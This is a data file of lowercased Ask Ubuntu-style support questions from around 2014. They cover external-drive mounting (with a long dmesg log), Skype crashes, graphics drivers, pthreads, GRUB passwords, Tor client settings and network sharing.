425129	unable to mount usb 3.0 external drive	[ update : i 've tried reformatting the drive as hfs+ and still run into this problem ] i have a 1tb lacie usb 3.0 external hard drive that is formatted as exfat . i ca n't get it to mount my intel nuc running ubuntu 13.10 . i 've installed the exfat-fuse support . it does not show up when i run sudo fdisk -l and when i run dmesg after connecting the drive i see the following output : ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver ehci-pci : ehci pci platform driver ehci-pci 0000:00:1d.0 : setting latency timer to 64 ehci-pci 0000:00:1d.0 : ehci host controller ehci-pci 0000:00:1d.0 : new usb bus registered , assigned bus number 1 ehci-pci 0000:00:1d.0 : debug port 2 ehci-pci 0000:00:1d.0 : cache line size of 64 is not supported ehci-pci 0000:00:1d.0 : irq 23 , io mem 0xf7c3b000 ehci-pci 0000:00:1d.0 : usb 2.0 started , ehci 1.00 usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 usb usb1 : new usb device strings : mfr=3 , product=2 , serialnumber=1 usb usb1 : product : ehci host controller usb usb1 : manufacturer : linux 3.11.0-17-generic ehci_hcd usb usb1 : serialnumber : 0000:00:1d.0 hub 1-0:1.0 : usb hub found hub 1-0:1.0 : 8 ports detected ehci-platform : ehci generic platform driver ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver ohci-pci : ohci pci platform driver ohci-platform : ohci generic platform driver uhci_hcd : usb universal host controller interface driver xhci_hcd 0000:00:14.0 : setting latency timer to 64 xhci_hcd 0000:00:14.0 : xhci host controller xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 2 xhci_hcd 0000:00:14.0 : cache line size of 64 is not supported xhci_hcd 0000:00:14.0 : irq 58 for msi/msi-x usb usb2 : new usb device found , idvendor=1d6b , idproduct=0002 usb usb2 : new usb device strings : mfr=3 , product=2 , serialnumber=1 usb usb2 : product : xhci host controller usb usb2 : manufacturer : linux 3.11.0-17-generic xhci_hcd usb usb2 : serialnumber : 0000:00:14.0 xhci xhci_add_endpoint called for root hub xhci xhci_check_bandwidth called for root hub hub 2-0:1.0 : usb hub found hub 2-0:1.0 : 9 ports detected xhci_hcd 0000:00:14.0 : xhci host controller xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 3 usb usb3 : new usb device found , idvendor=1d6b , idproduct=0003 usb usb3 : new usb device strings : mfr=3 , product=2 , serialnumber=1 usb usb3 : product : xhci host controller usb usb3 : manufacturer : linux 3.11.0-17-generic xhci_hcd usb usb3 : serialnumber : 0000:00:14.0 xhci xhci_add_endpoint called for root hub xhci xhci_check_bandwidth called for root hub hub 3-0:1.0 : usb hub found hub 3-0:1.0 : 4 ports detected i8042 : pnp : no ps/2 controller found . probing ports directly . i8042 : no controller found tsc : refined tsc clocksource calibration : 1696.075 mhz mousedev : ps/2 mouse device common for all mice rtc_cmos 00:05 : rtc can wake from s4 rtc_cmos 00:05 : rtc core : registered rtc_cmos as rtc0 rtc_cmos 00:05 : alarms up to one month , y3k , 242 bytes nvram , hpet irqs device-mapper : uevent : version 1.0.3 device-mapper : ioctl : 4.25.0-ioctl ( 2013-06-26 ) initialised : dm-devel @ redhat.com cpuidle : using governor ladder cpuidle : using governor menu ledtrig-cpu : registered to indicate activity on cpus efi variables facility v0.08 2004-may-17 tcp : cubic registered net : registered protocol family 10 net : registered protocol family 17 key type dns_resolver registered pm : hibernation image not present or could not be loaded . loading module verification certificates modsign : loaded cert 'magrathea : glacier signing key : 2a3861a17986e2fcfa4fcad981cb7e6fd9516274' registered taskstats version 1 key type trusted registered key type encrypted registered apparmor : apparmor sha1 policy hashing enabled magic number : 2:668:437 rtc_cmos 00:05 : setting system clock to 2014-02-23 15:25:18 utc ( 1393169118 ) bios edd facility v0.16 2004-jun-25 , 0 devices found edd information not available . freeing unused kernel memory : 1364k ( ffffffff81d10000 - ffffffff81e65000 ) write protecting the kernel read-only data : 12288k freeing unused kernel memory : 1032k ( ffff8800026fe000 - ffff880002800000 ) freeing unused kernel memory : 784k ( ffff880002b3c000 - ffff880002c00000 ) systemd-udevd [ 114 ] : starting version 204 pps_core : linuxpps api ver . 1 registered pps_core : software ver . 5.3.6 - copyright 2005-2007 rodolfo giometti < giometti @ linux.it > ptp clock support registered ahci 0000:00:1f.2 : version 3.0 ahci 0000:00:1f.2 : irq 59 for msi/msi-x xor : automatically using best checksumming function : e1000e : intel ( r ) pro/1000 network driver - 2.3.2-k e1000e : copyright ( c ) 1999 - 2013 intel corporation . ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 2 ports 6 gbps 0x8 impl sata mode ahci 0000:00:1f.2 : flags : 64bit ncq pm led clo only pio slum part deso sadm sds apst ahci 0000:00:1f.2 : setting latency timer to 64 scsi0 : ahci scsi1 : ahci scsi2 : ahci scsi3 : ahci ata1 : dummy ata2 : dummy ata3 : dummy ata4 : sata max udma/133 abar m2048 @ 0xf7c3a000 port 0xf7c3a280 irq 59 e1000e 0000:00:19.0 : setting latency timer to 64 e1000e 0000:00:19.0 : interrupt throttling rate ( ints/sec ) set to dynamic conservative mode e1000e 0000:00:19.0 : irq 60 for msi/msi-x avx : 15491.000 mb/sec device-mapper : dm-raid45 : initialized v0.2594b usb 1-1 : new high-speed usb device number 2 using ehci-pci e1000e 0000:00:19.0 eth0 : registered phc clock e1000e 0000:00:19.0 eth0 : ( pci express:2.5gt/s : width x1 ) ec : a8:6b : fe : e9:13 e1000e 0000:00:19.0 eth0 : intel ( r ) pro/1000 network connection e1000e 0000:00:19.0 eth0 : mac : 11 , phy : 12 , pba no : ffffff-0ff usb 1-1 : new usb device found , idvendor=8087 , idproduct=8000 usb 1-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 hub 1-1:1.0 : usb hub found hub 1-1:1.0 : 8 ports detected ata4 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) ata4.00 : supports drm functions and may not be fully accessible ata4.00 : ata-9 : crucial_ct120m500ssd3 , mu03 , max udma/133 ata4.00 : 234441648 sectors , multi 16 : lba48 ncq ( depth 31/32 ) , aa ata4.00 : supports drm functions and may not be fully accessible ata4.00 : configured for udma/133 scsi 3:0:0:0 : direct-access ata crucial_ct120m50 mu03 pq : 0 ansi : 5 sd 3:0:0:0 : attached scsi generic sg0 type 0 sd 3:0:0:0 : [ sda ] 234441648 512-byte logical blocks : ( 120 gb/111 gib ) sd 3:0:0:0 : [ sda ] 4096-byte physical blocks sd 3:0:0:0 : [ sda ] write protect is off sd 3:0:0:0 : [ sda ] mode sense : 00 3a 00 00 sd 3:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua sda : sda1 sda2 sda3 sd 3:0:0:0 : [ sda ] attached scsi disk usb 3-2 : new superspeed usb device number 2 using xhci_hcd bio : create slab < bio-1 > at 1 usb 3-2 : new usb device found , idvendor=059f , idproduct=104c usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 usb 3-2 : product : d2 quadra v3 usb 3-2 : manufacturer : lacie usb 3-2 : serialnumber : 355650394a37414a usb-storage 3-2:1.0 : usb mass storage device detected scsi4 : usb-storage 3-2:1.0 usbcore : registered new interface driver usb-storage ext4-fs ( dm-0 ) : info : recovery required on readonly filesystem ext4-fs ( dm-0 ) : write access will be enabled during recovery ext4-fs ( dm-0 ) : recovery complete ext4-fs ( dm-0 ) : mounted filesystem with ordered data mode . opts : ( null ) adding 8151036k swap on /dev/mapper/ubuntu -- vg-swap_1 . priority : -1 extents:1 across:8151036k ssfs ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready systemd-udevd [ 390 ] : starting version 204 lp : driver loaded but no devices found nuvoton-cir 00:08 : ir pnp port not valid ! ext4-fs ( dm-0 ) : re-mounted . opts : errors=remount-ro mei_me 0000:00:16.0 : setting latency timer to 64 mei_me 0000:00:16.0 : irq 61 for msi/msi-x acpi warning : 0x0000000000001828-0x000000000000182f systemio conflicts with region \pmio 1 ( 20130517/utaddress-251 ) acpi : if an acpi driver is available for this device , you should use it instead of the native driver acpi warning : 0x0000000000001c30-0x0000000000001c3f systemio conflicts with region \gprl 1 ( 20130517/utaddress-251 ) acpi warning : 0x0000000000001c30-0x0000000000001c3f systemio conflicts with region \gpr_ 2 ( 20130517/utaddress-251 ) acpi : if an acpi driver is available for this device , you should use it instead of the native driver acpi warning : 0x0000000000001c00-0x0000000000001c2f systemio conflicts with region \gprl 1 ( 20130517/utaddress-251 ) acpi warning : 0x0000000000001c00-0x0000000000001c2f systemio conflicts with region \gpr_ 2 ( 20130517/utaddress-251 ) acpi : if an acpi driver is available for this device , you should use it instead of the native driver lpc_ich : resource conflict ( s ) found affecting gpio_ich [ drm ] initialized drm 1.1.0 20060810 type=1400 audit ( 1393169119.450:2 ) : apparmor= '' status '' operation= '' profile_load '' parent=452 profile= '' unconfined '' name= '' /sbin/dhclient '' pid=454 comm= '' apparmor_parser '' type=1400 audit ( 1393169119.450:3 ) : apparmor= '' status '' operation= '' profile_load '' parent=452 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=454 comm= '' apparmor_parser '' type=1400 audit ( 1393169119.450:4 ) : apparmor= '' status '' operation= '' profile_load '' parent=452 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=454 comm= '' apparmor_parser '' type=1400 audit ( 1393169119.450:5 ) : apparmor= '' status '' operation= '' profile_replace '' parent=452 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=454 comm= '' apparmor_parser '' type=1400 audit ( 1393169119.450:6 ) : apparmor= '' status '' operation= '' profile_replace '' parent=452 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=454 comm= '' apparmor_parser '' type=1400 audit ( 1393169119.450:7 ) : apparmor= '' status '' operation= '' profile_replace '' parent=452 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=454 comm= '' apparmor_parser '' [ drm ] memory usable by graphics device = 2048m i915 0000:00:02.0 : setting latency timer to 64 microcode : cpu0 sig=0x40651 , pf=0x40 , revision=0x15 i915 0000:00:02.0 : irq 62 for msi/msi-x [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ drm ] driver supports precise vblank timestamp query . vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+mem , decodes=io+mem : owns=io+mem switched to clocksource tsc i915 0000:00:02.0 : no connectors reported connected with modes [ drm ] can not find any crtc or sizes - going 1024x768 fbcon : inteldrmfb ( fb0 ) is primary device console : switching to colour frame buffer device 128x48 i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device i915 0000:00:02.0 : registered panic notifier device-mapper : multipath : version 1.6.0 loaded acpi device:46 : registered as cooling_device9 acpi : video device [ gfx0 ] ( multi-head : yes rom : no post : no ) input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:00/input/input2 [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 snd_hda_intel 0000:00:03.0 : enabling device ( 0000 - > 0002 ) hda driver get symbol successfully from i915 module snd_hda_intel 0000:00:03.0 : irq 63 for msi/msi-x snd_hda_intel 0000:00:1b.0 : enabling device ( 0000 - > 0002 ) snd_hda_intel 0000:00:1b.0 : irq 64 for msi/msi-x hda_codec : invalid connect_list verb 5 [ 1 ] :0 hda_codec : invalid connect_list verb 6 [ 1 ] :0 input : hda intel mid hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:03.0/sound/card0/input3 sku : nid=0x1d sku_cfg=0x40941905 sku : port_connectivity=0x1 sku : enable_pcbeep=0x1 sku : check_sum=0x00000004 sku : customization=0x00000019 sku : external_amp=0x0 sku : platform_type=0x1 sku : swap=0x0 sku : override=0x1 autoconfig : line_outs=1 ( 0x21/0x0/0x0/0x0/0x0 ) type : hp speaker_outs=0 ( 0x0/0x0/0x0/0x0/0x0 ) hp_outs=0 ( 0x0/0x0/0x0/0x0/0x0 ) mono : mono_out=0x0 inputs : mic=0x19 internal mic=0x12 realtek : no valid ssid , checking pincfg 0x40941905 for nid 0x1d realtek : enabling init asm_id=0x1905 codec_id=10ec0283 input : hda intel mid hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:03.0/sound/card0/input4 input : hda intel pch headphone as /devices/pci0000:00/0000:00:1b.0/sound/card1/input5 input : hda intel pch mic as /devices/pci0000:00/0000:00:1b.0/sound/card1/input6 microcode : cpu1 sig=0x40651 , pf=0x40 , revision=0x15 microcode : cpu2 sig=0x40651 , pf=0x40 , revision=0x15 microcode : cpu3 sig=0x40651 , pf=0x40 , revision=0x15 microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba bluetooth : core ver 2.16 net : registered protocol family 31 bluetooth : hci device and connection manager initialized bluetooth : hci socket layer initialized bluetooth : l2cap socket layer initialized bluetooth : sco socket layer initialized bluetooth : bnep ( ethernet emulation ) ver 1.3 bluetooth : bnep filters : protocol multicast bluetooth : bnep socket layer initialized bluetooth : rfcomm tty layer initialized bluetooth : rfcomm socket layer initialized bluetooth : rfcomm ver 1.11 init : failsafe main process ( 697 ) killed by term signal init : avahi-cups-reload main process ( 778 ) terminated with status 1 ppdev : user-space parallel port driver parport0 : pc-style at 0x378 ( 0x778 ) [ pcspp , tristate ] parport0 : irq 0 detected lp0 : using parport0 ( polling ) . type=1400 audit ( 1393169120.363:8 ) : apparmor= '' status '' operation= '' profile_load '' parent=958 profile= '' unconfined '' name= '' /usr/lib/x86_64-linux-gnu/lightdm-remote-session-freerdp/freerdp-session-wrapper '' pid=964 comm= '' apparmor_parser '' type=1400 audit ( 1393169120.363:9 ) : apparmor= '' status '' operation= '' profile_load '' parent=958 profile= '' unconfined '' name= '' chromium_browser '' pid=964 comm= '' apparmor_parser '' type=1400 audit ( 1393169120.363:10 ) : apparmor= '' status '' operation= '' profile_replace '' parent=958 profile= '' unconfined '' name= '' chromium_browser '' pid=964 comm= '' apparmor_parser '' e1000e 0000:00:19.0 : irq 60 for msi/msi-x e1000e 0000:00:19.0 : irq 60 for msi/msi-x ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready init : gdm main process ( 1137 ) killed by term signal [ drm ] enabling rc6 states : rc6 on , rc6p off , rc6pp off ahci 0000:00:1f.2 : port does not support device sleep e1000e : eth0 nic link is up 1000 mbps full duplex , flow control : rx/tx ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready scsi 4:0:0:0 : direct-access lacie d2 quadra v3 223x pq : 0 ansi : 4 sd 4:0:0:0 : attached scsi generic sg1 type 0 sd 4:0:0:0 : [ sdb ] 1953519616 512-byte logical blocks : ( 1.00 tb/931 gib ) usb 3-2 : disable of device-initiated u1 failed . usb 3-2 : disable of device-initiated u2 failed . usb 3-2 : device not responding to set address . usb 3-2 : device not responding to set address . usb 3-2 : device not accepting address 2 , error -71 usb 3-2 : usb disconnect , device number 2 sd 4:0:0:0 : [ sdb ] write protect is off sd 4:0:0:0 : [ sdb ] mode sense : 4b 00 10 08 sd 4:0:0:0 : [ sdb ] asking for cache data failed sd 4:0:0:0 : [ sdb ] assuming drive cache : write through sd 4:0:0:0 : [ sdb ] read capacity failed sd 4:0:0:0 : [ sdb ] result : hostbyte=did_no_connect driverbyte=driver_ok sd 4:0:0:0 : [ sdb ] sense not available . sd 4:0:0:0 : [ sdb ] no caching mode page found sd 4:0:0:0 : [ sdb ] assuming drive cache : write through sdb : detected capacity change from 1000202043392 to 0 sd 4:0:0:0 : [ sdb ] read capacity failed sd 4:0:0:0 : [ sdb ] result : hostbyte=did_no_connect driverbyte=driver_ok sd 4:0:0:0 : [ sdb ] sense not available . sd 4:0:0:0 : [ sdb ] no caching mode page found sd 4:0:0:0 : [ sdb ] assuming drive cache : write through sd 4:0:0:0 : [ sdb ] attached scsi disk xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff88020f8a0ec0 xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff88020f8a0e80 systemd-hostnamed [ 2217 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! usb 3-2 : new superspeed usb device number 3 using xhci_hcd usb 3-2 : new usb device found , idvendor=059f , idproduct=104c usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 usb 3-2 : product : d2 quadra v3 usb 3-2 : manufacturer : lacie usb 3-2 : serialnumber : 355650394a37414a usb-storage 3-2:1.0 : usb mass storage device detected scsi5 : usb-storage 3-2:1.0 scsi 5:0:0:0 : direct-access lacie d2 quadra v3 223x pq : 0 ansi : 4 sd 5:0:0:0 : attached scsi generic sg1 type 0 sd 5:0:0:0 : [ sdb ] 1953519616 512-byte logical blocks : ( 1.00 tb/931 gib ) usb 3-2 : disable of device-initiated u1 failed . usb 3-2 : disable of device-initiated u2 failed . usb 3-2 : device not responding to set address . usb 3-2 : device not responding to set address . usb 3-2 : device not accepting address 3 , error -71 usb 3-2 : usb disconnect , device number 3 sd 5:0:0:0 : [ sdb ] write protect is off sd 5:0:0:0 : [ sdb ] mode sense : 4b 00 10 08 sd 5:0:0:0 : [ sdb ] no caching mode page found sd 5:0:0:0 : [ sdb ] assuming drive cache : write through sd 5:0:0:0 : [ sdb ] read capacity failed sd 5:0:0:0 : [ sdb ] result : hostbyte=did_no_connect driverbyte=driver_ok sd 5:0:0:0 : [ sdb ] sense not available . sd 5:0:0:0 : [ sdb ] asking for cache data failed sd 5:0:0:0 : [ sdb ] assuming drive cache : write through sdb : detected capacity change from 1000202043392 to 0 sd 5:0:0:0 : [ sdb ] read capacity failed sd 5:0:0:0 : [ sdb ] result : hostbyte=did_no_connect driverbyte=driver_ok sd 5:0:0:0 : [ sdb ] sense not available . sd 5:0:0:0 : [ sdb ] no caching mode page found sd 5:0:0:0 : [ sdb ] assuming drive cache : write through sd 5:0:0:0 : [ sdb ] attached scsi disk xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8801cfe306c0 xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8801cfe30680
425130	unable to connect to internet with ubuntu 12.04 lts	i wanted to try ubuntu , but wubi refused to work with me , so i got a pre-created ubuntu vm , and used virtualbox to use it . ubuntu had a great interface , and i liked it , but it refused to connect to the internet . i tried searching through ask ubuntu and other sites , but found no help . if someone could help me out , it would be very much appreciated .
425135	overclocking amd processor	i was wondering if there are any overclocking tools that would work with an amd a10 5745m processor . really all i need to do is be able to manage my cpu clock speed and if possible cpu temp and stability test . but i 'll settle for just managing my clock speed . i am running ubuntu 13.10 . please help
425136	13.10 : skype closes after logging in	i need skype for work but it 's been almost impossible to install . i 've uninstalled and reinstalled it countless times now . i must 've tried every permutation possible of the instructions here . i 've tried downloading and installing directly from the website , tried following the instructions on probably a dozen forums or similar questions from here but nothing has worked . the closest i 've got is installing via the software center which allows me to open the login screen of skype but as soon as i login the screen disappears , running it from the terminal creates this error log but i ca n't make heads or tails of it . i 've looked at downgrading to 13.04 dual-booting with another os or finding an alternative service that can accept skype messages and calls but all those options seem like a huge pain for what should be a simple matter . i 'd greatly appreciate help here .
425140	unable toboot with nvidia gtx 750 ti , even with latest beta drivers	yesterday i got a nvidia gtx 750ti for my htpc ( ubuntu headless 12.04 ) but the computer wont boot with it installed . i 've tried booting with nomodeset parameter and installing the latest beta driver from nvidia but i get black screen on boot . the machine does not seem to boot as i can not ssh into it or invoke ctrl-alt-f*
425146	does operating system scheduler affect the way how threads are executed	i am coding a multi-thread application using the pthread library , i create a thread using pthread_create and run randomfunction everything a thread is created psedo-code of application pthread_t thread [ 10 ] ; for ( int i=0 ; i < 10 ; i++ ) { pthread_create ( & thread [ i ] , null , randomfunction , null ) } for some unknown reason , the threads are not running concurrently but running one after the other , its like the pthread function has to execute finish before another pthread_create is executed . i am wondering if its possible that the ubuntu operating system scheduler is affecting the way the threads are being executed . is it possible that the ubuntu operating system scheduler is causing the threads to run only when the calling function has finished executing rather than concurrently ? ? ? i am running ubuntu 9.10 on vmware windows 7
425151	ubuntu 13.10 - standby after waking up from hibernate	my ubuntu 13.10 goes on standby when i waking up from hibernate . it shows my desktop ( or whatever windows were open when it hibernated ) when i turn it on , and then goes on standby , and then when i do any action it asks me for password to log in . there does n't seem to be any setting that would do this ? a bug maybe ? i upgraded from 13.04 to 13.10 as this problem started after upgrade .
425153	change or assign a drive letter to an external hard drive ( or any drive )	i have an external hard drive that i formatted with ubuntu ( using the gnome disk utility aka disks ) as an ntfs file system . most of my computers in the house run linux but i have a house mate using windows 7 . usually this external hard drive is connected to a file server and files are accessed over the network ; however my file server broke down and i wanted to plug this external drive into my house mate 's windows 7 computer in the meantime so he can still access our media . the drive is detected fine by windows and it installs the drivers successfully and the device manager reports the device is working properly but it will not show up in windows explorer . after doing some googling and checking out the disk management utility in windows , i 've discovered the problem to be that the external drive has no drive letter assigned to it and that 's why windows ca n't bring it to the file manager . the usual solution is to use the disk management utility in windows to assign a drive letter but the option is greyed out ( yay windows ! ) . i found a way to assign a drive letter through dos using diskpart but do n't have access to a windows computer atm . i 'd like to assign a drive letter to this drive ( and a couple other similar ntfs drives ) from one of my linux machines so that he can just plug in the drive when he gets home and not have to have me there to set it up . so , unfortunately all the ask ubuntu questions that have a title asking how to change the drive letter of a disk are actually pleas for support and were resolved in other ways ... i would actually just like to know how to assign or change the drive letter of a disk . gui or cli is fine , however cli is preferred . i could n't find anything in the man pages on parted about it , nor could i find any options in gparted or gnome disk utility . i also could n't find much by googling , except some people suggesting that it 's not even possible to do from a linux machine because linux does n't use drive letters , but i doubt that . thanks . question : how to change or assign drive letter to disk ? preferably using cli , but instructions to use a gui are also acceptable ( read above only if you need to know why ) .
425155	my wireless/wifi connection does not work . what information is needed to diagnose the issue ?	your situation you have successfully installed ubuntu . you have just downloaded and booted ubuntu live media . the latest lts ( see also hwe ) or latest non-lts release are preferred . see the list of ubuntu releases that are currently supported . ) you upgraded your ubuntu installation to the latest release that the software updater offered you . wifi worked before , but not now on the new release . you migrated your existing ubuntu installation to new hardware . your problem the wireless of your laptop or dekstop is not working . you tried switching the wireless switch off and on and you tried rebooting several times , but you do n't see any wifi access points . you can see your wireless access point , but you can not establish a connection . you want to analyze the problem , but you do n't know where to start or what information you can provide . this question and answer was written to give people the wireless script that will provide the information needed in most cases to diagnose their wireless issue 's . related questions i have a hardware detection problem , what logs do i need to look into ?
425157	ubuntu 13.10 ( upgrade from 13.04 ) unresponsive during high cpu load	i have a samsung series 9 laptop with a 4-core processor , 4gb ram and 12gb swap . during compiling an android project it becomes unresponsive to the point where the mouse pointer stops moving , and it usually stays this way for about 30 seconds before abruptly jumping around to where i wanted it to go . is normal behavior ? would this be a compiz problem , or something related to the graphics card ? ( i 'm using the i915 intel driver . ) my ssd hard drive is encrypted , if that matters .
425158	char device to access gps on a nexus 4 with ubuntu touch	trying to access the gps data on a nexus 4 phone with ubuntu touch on it . does anyone know if there is /dev/ to read the raw nmea data stream ? i did several researches online but can not get any info on that . as far as i understand the gps chip is an avago device , but i was not able to find the linux drivers ( i was hoping to get some low level details reading the driver code )
425159	setup password for ubuntu bootloader to protect my system from clearing root password ?	how to set a password for the grub so it prompt for user authentication to boot the system .
425161	new to linux ubuntu	i 'm currently using windows 7 and i 'm planning to install ubuntu downloaded on this site . is there a way to install ubuntu directly while using windows without burning it first onto a disk ? if possible will it affect the performance of ubuntu in some way if i installed ubuntu in windows ? do i need to wipe windows first to fully enjoy ubuntu or the former is ok ? this is the first time i 'm trying to use a different os on pc , i would be very delighted if i could receive experts advises from you guys..help me please
425163	download ubuntu mobile to htc one ?	so i am in love with ubutnu , but have n't really looked into the mobile platform until just recently . i think it looks beautiful , and am excited to have the power of a fully functional computer in my hand . i have also heard of some devices being able to dual boot into both android and the ubuntu mobile os . is this the case with all android devices , or are there only a few capable of this ? if only select devices can do it , what causes them to be able to do so ? ( for example , do they need access to a sort of `` phone bios '' ? ) i am looking to buy the htc one here in a month or so when my version contract renews , but was interested if it could also run ubuntu mobile . thanks guys !
425165	ubuntu 13.10 64 bit compiz + qube desktop + nvidia = three monitors	so i have three monitors benq ( should be left is center ) laptop ( should be center is left ) samsung ( is right ) i placed all the details about the grpahic card / drivers and system below the problem description . problem description : compiz works fine , qube desktop works fine , but it rotates all three screens which i do n't like . i would like them to be separate screens to be able to rotate them separately . nvidia drivers were installed to accomplish that by taking off the `` tween view '' and marking all the screens as separate in hope that this will detach the screens from each other and the qube desktop will now work as required . i can not accomplish that because no setting made inside the `` nvidia x server settings '' window survives the reboot . ( that 's the first problem ) the other thing is that i would need someone to tell me - is it at all possible to make the qube desktop work with all three screens , has it been done before ? cat /proc/version linux version 3.11.0-17-generic ( buildd @ toyol ) ( gcc version 4.8.1 ( ubuntu/linaro 4.8.1-10ubuntu8 ) ) # 31-ubuntu smp mon feb 3 21:52:43 utc 2014 lshw -c video *-display description : vga compatible controller product : gk107m [ geforce gtx 660m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0
425169	can i install ubuntu on my pen drive	can i install ubuntu on my pen drive , i do not want to install it at my system 's drive i just want whenever i plug the pen drive , run ubuntu else run my windows 8 is it possible if it is possible.. will get my data back after shutdown and restart with ubuntu . pls help me thanks
425176	multiseat in ubuntu 13.10	i have a ubuntu 13.10 desktop machine with one intel integrated graphic card and one pci graphic card.i want to implement multiseat ( 2 seats ) configuration with own set of keyboards , mice , and monitors providing a traditional desktop experience to each user . please tell me what config files i have to edit . and please guide me about every single step to implement this . i am new to linux . thanks you very much in advance output of lspci | grep vga is sardar @ sardar-hp-compaq-6200-pro-mt-pc : ~ $ lspci |grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 05:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rage xl pci ( rev 27 )
425177	problem with installation ubuntu 13.10 and 12.04	hi guys i have a problem with installation on ubuntu 13.10 , i tried with ubuntu 12.04 too . when i start to install every thing looks good and then hdd format process shows me this window of failed installation i have laptop hp probook 4540s .
425179	need russian keyboard option i do not have a gnome desktop have ubuntu	i upgraded to 13.10 , and need to use my russian keyboard option i had in 12.10 i do not have a gnome desktop - says ubuntu desktop
425182	run tor as client only	i 'm running tor with the following command : tor -- clientonly 1 -- runasdaemon 1 -- cookieauthentication 0 -- controlport 8119 -- pidfile tor1.pid -- socksport 9051 -- datadirectory data/tor/tor1 this create an instance , which i can use via : 127.0.0.1:9051 however , when i create it , my bandwidth is fully used by tor . i am guessing as a relay . i 've tried a lot of things , but nothing seems to change this . -- clientonly 1 does nothing . does anyone know why this is using all my bandwidth and how to stop it ?
425184	`` system is running in low-graphics mode '' error	i am very new to working with ubuntu and working with command line input . last night i tried to install netflix desktop app which required wine-compholio , wine-browser-installer and lib ( i forget the rest of it ) . i noticed that when i was installing these , a lot of other programs were removed . after i installed the programs i tried to reboot my laptop . it would n't shutdown so i had to hard-shutdown . when turning it on again it gave me a `` system is running in low-graphics mode '' error . i have tried to solve the problem myself by researching it online but nothing has helped . i 've tried using recovery mode , opening a terminal , trying to install nvidia and fglrx , but nothing has worked . also , i keep getting the following warnings when trying to install anything in recovery mode terminal : caution warning : failed to detect canonical device of /dev/sda5 caution warning : could not determine root device from /etc/fstab i really need some help . thank you , edward
425185	ca n't install bastille on ubuntu saucy 13.10	i followed the ubuntu community help wiki . i enabled universe repository . but apt-get and aptitude both fail with `` no candidate found '' . i assume this means bastille is not available for saucy ? any assistance would be appreciated .
425186	running multiple internet connections simultaneously	does it really matter if i connect two or more internet connections ( from different isps or sources ) simultaneously ? do all of these speeds add up ? or ubuntu just sticks with one connection and others just kept connected doing nothing ? is it possible i can make all the internet connections added up and have a faster internet ? obviously the speeds wo n't add up but load can be shared . can i do this ?
425192	how do i unprotect a file which is owned by root ?	12.04 lts and i mistakenly protected a file named set using : chmod 700 /home/jatin/desktop/set how do i unprotect it ?
425195	ubuntu 12.04 - can not try ubuntu with live cd	i am trying to try ubuntu using the live cd of ubuntu 12.04 . however , after the splash screen of the live cd , i 'm getting stucked with a black background and a white cursor . this happens , either if i choose `` try ubuntu without any change to your computer '' or `` install ubuntu '' . i tried to set some options using the f6 command . either acpi=off , noapic , nolapic one at the time or all together ( in fact every possible combinations ) . if i do n't put any options , i get the following errors : squashfs error : zlib_inflate_error , data probably corrupt squashfs squashfs error : squash_read_data failed to read block squashfs error : unable to squashfs error : read fragment cache entry i tried different usb sticks and i get the same error . i tried on another computer and it works so it does not seem to be the usb stick or the image ... edit # 2 : after juste restarting and hoping , i got once the following error : stopping system v runlevel compatibility
425196	ubuntu 12.04 not properly recognising headphones	no matter what pair of headphones i use , in the sound settings , the headphones option will constantly flash on , then disappear whenever i play audio . i 've tried a cheap pair of logitech headphones , and a pair of sylvania wireless headphones . ( which are connected to my computer through a headphone jack . )
425206	setting null password locks me out of updates	i changed the installation password to ( none ) after install which works great at boot . now i can not install updates because all administrative programs keep asking for a password and will not accept a null password nor the original password . any way to fix this without a new install ?
425210	how to forward ethernet internet from ubuntu pc via wifi stick to windows 8 laptop	this is my setup : ubuntu pc connected via ethernet connection to a lan that has internet connection has a wifi stick , ( the router does not have wifi support ) windows 8 laptop with only wifi ( no ethernet port ) . this is what i need : i want to configure my ubuntu ( precise 12.04 ) pc to share the internet coming from my ethernet connection , via the wifi stick , to the windows 8 laptop . secondary objective : eventually , i want the laptop to behave as if it is connected directly to my router ( have internet connection obviously , maybe get ip from the router 's dhcp , interact with other lan computers , etc ... )
